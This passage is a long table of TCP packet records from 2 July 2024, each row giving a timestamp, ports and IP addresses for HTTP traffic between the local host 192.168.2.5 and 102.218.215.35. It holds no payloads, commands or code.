Jul 2, 2024 08:14:31.892049074 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.892059088 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.892071009 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.892081976 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.892147064 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:31.892246008 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:31.892513037 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.892613888 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.892625093 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.892661095 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.892676115 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.892697096 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:31.893404961 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.893450975 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.893475056 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:31.893599033 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:31.895833015 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.895931005 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.899882078 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.127078056 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.127105951 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.127116919 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.127185106 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.127213955 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.127232075 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.127243996 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.127266884 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.127319098 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.127938032 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.127950907 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.127962112 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.127973080 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.127974987 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.127984047 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.128009081 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.128058910 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.128146887 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.128196955 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.128207922 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.128221989 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.128263950 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.128298998 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.128309011 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.128319979 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.128344059 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.128379107 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.128441095 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.128453016 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.128504992 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.128901958 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.128964901 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.128982067 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.129005909 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.129014969 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.129015923 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.129028082 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.129065990 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.129259109 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.129321098 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.129333019 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.129350901 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.129384041 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.129410982 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.129422903 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.129435062 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.129470110 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.129488945 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.130024910 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.130095005 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.130099058 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.130150080 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.130188942 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.130188942 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.130208969 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.130219936 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.130265951 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.130275965 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.130276918 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.130347013 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.130697012 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.130739927 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.130752087 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.130780935 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.130780935 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.130806923 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.130817890 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.130872011 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.131367922 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.131378889 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.131391048 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.131444931 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.131444931 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.131468058 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.131478071 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.131526947 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.132330894 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.132350922 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.132399082 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.132399082 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.132435083 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.132447004 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.132457972 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.132477045 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.132494926 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.364247084 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.364312887 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.364324093 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.364406109 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.364417076 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.364413977 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.364428043 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.364458084 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.364468098 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.364723921 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.364765882 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.364768982 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.364777088 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.364814043 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.364840984 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.364852905 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.364903927 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.365489006 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.365498066 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.365509987 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.365547895 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.365551949 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.365562916 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.365575075 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.365588903 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.365606070 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.365649939 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.365686893 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.365741014 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.365756989 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.365767956 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.365778923 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.365789890 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.366092920 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.366166115 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.366177082 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.366187096 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.366262913 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.366275072 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.366286039 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.366297007 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.366322994 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.366369009 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.366379976 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.366838932 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.366889954 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.366900921 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.366952896 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.366964102 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.367424011 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.367527962 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.367538929 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.367557049 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.367567062 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.367578030 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.367794037 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.367872000 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.367902994 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.367944002 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.367954969 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.367976904 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.367988110 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.367988110 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.367997885 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.368014097 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.368038893 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.369280100 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.369323969 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.369352102 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.369362116 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.369371891 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.369384050 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.369391918 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.369394064 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.369401932 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.369405985 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.369431019 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.369442940 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.369474888 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.369487047 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.369518995 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.369591951 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.369602919 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.369612932 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.369625092 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.369636059 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.369638920 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.369647980 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.369649887 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.369682074 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.369836092 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.369847059 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.369857073 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.369879961 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.369893074 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.369900942 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.369911909 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.369935989 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.369947910 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.369975090 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.369987965 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.369998932 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.370008945 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.370028019 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.370043993 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.370055914 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.370070934 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.370155096 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.370166063 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.370193005 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.370204926 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.370529890 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.370548964 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.370559931 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.370572090 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.370594025 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.370594978 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.370624065 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.370625973 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.370634079 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.370661020 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.370740891 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.370749950 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.370762110 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.370773077 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.370778084 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.370791912 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.370794058 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.370805979 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.370825052 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.370825052 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.370836020 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.370863914 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.371139050 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.371174097 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.371185064 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.371186018 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.371203899 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.371208906 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.371217966 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.371234894 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.371339083 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.371444941 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.371483088 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.453003883 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.453020096 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.453059912 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.453071117 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.453082085 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.453094006 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.453142881 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.453180075 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.453216076 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.453226089 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.453236103 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.453237057 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.453248978 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.453259945 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.453277111 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.453315020 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.453407049 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.453454971 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.453466892 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.453479052 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.453520060 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.453568935 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.453581095 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.453624010 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.601157904 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.601176023 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.601188898 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.601208925 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.601219893 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
